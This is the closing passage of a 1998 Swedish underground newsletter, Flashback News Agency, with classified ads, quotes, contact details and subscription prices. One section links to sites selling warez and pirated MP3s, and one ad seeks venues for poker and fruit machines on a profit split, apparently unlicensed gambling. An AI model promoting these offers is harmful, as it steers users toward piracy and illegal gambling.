med synthmusik. Har Front 242 (tre filmer), Skinny Puppy, Klinik, Cabs o.s.v. Email: funkervogt@kurir.net # Ö V R I G T Hyr extra e-mail adress anonymt för 99:-/år. Email: hn@oden.se Har två Poker o två Fruktmaskiner men inget bra ställe att placera ut dom på. Har du nåt bra ställe så delar vi 50/50. Kan bli mycket stora pengar på rätt ställe. Email: pelle66@hotmail.com _______________________________________________________ Vill du annonsera i FNA? Skicka då annonsen till: fna@flashback.se enligt formulärets uppbyggnad nedan: Rubrik: (högst 50 nedslag) Annons: (högst 300 nedslag) Emailadress: Annonser som skickas html-kodade eller är uppenbart olagliga refuseras. Endast annonser med någon form av undergroundanknytning publiceras. Undvik att skriva annonsen med endast versaler (stora bokstäver). __________________________________________________________________________ 27. LINKS TO THE UNDERGROUND ========================== Softwarez Inc: http://travel.to/softwarez (Warez & MP3 till salu) CD 4 Fun: http://members.tripod.com/~cd4fun/index.html (Mer Warez till salu) [Bidragsgivare: Micke] __________________________________________________________________________ 28. SMÅTT & GOTT ========================== "Redan de gamla grekerna trodde sig leva i nutiden" "Brinn så länge du lever. Låt ingen släcka din glöd. Brinn så alla kan se dig. Vägra va´ levande död" "Politiker säger: Alkoholen är din fiende. Gud säger: Älska din fiende" "Njut av livet... Det går inte i repris!" [Bidragsgivare: Calle, GREN, Mattias & Pelle Rylander] __________________________________________________________________________ Vet du om någon intressant nyhet eller känner till någon kul notis. Maila den då gärna till: fna@flashback.se. __________________________________________________________________________ F L A S H B A C K N E W S A G E N C Y ( F N A ) / F L A S H B A C K : Postadress------------------- Flashback, Box 676, 114 79 Stockholm, Sweden Email (Flashback)---------------------------------- flashback@flashback.se Email (FNA)---------------------------------------------- fna@flashback.se WWW (Flashback)----------------------------------- http://www.flashback.se WWW (Flashback Community)------------------------ http://www.flashback.net IRC-------------------------------------------------- #flashback (irc.net) Usenet------------------------------------------------------ alt.flashback FTP------------------------------------------------------ ftp.flashback.se Gopher------------------------------------------------ gopher.flashback.se Fax--------------------------------------------------------- 08-503 111 03 Postgiro------------------------------------------------------- 39 64 28-5 Bankgiro-------------------------------------------------------- 5355-6866 _______________________________________________________ P R E N U M E R A T I O N - F N A : G R A T I S Starta prenumeration på FNA: Skicka meddelandet "subscribe FNA-L" till: majordomo@flashback.se Avsluta prenumeration på FNA: Skicka meddelandet "unsubscribe FNA-L" till: majordomo@flashback.se Vid byte av email-adress måste du först avsluta din gamla adress, och sedan förnya din nya enligt rutinen ovan. Observera att all hantering av prenumeranter sköts automatiskt, och *INTE* manuellt. Du kan m.a.o. *INTE* ansöka om en prenumeration till adressen: fna@flashback.se. _______________________________________________________ P R E N U M E R A T I O N - F L A S H B A C K ( 3 N U M M E R ) Sverige: 150kr (Stödprenumeration: 200kr) Norden: 200kr Europa: 250kr Världen: 275kr + + + © NO copyright / NO rights reserved - FLASHBACK 1998 FLASHBACK 1983-1998: 15 YEARS OF UNDERGROUND - AND STILL IN THE BUSINESS * * * * * * * * * * * * * * * * * * *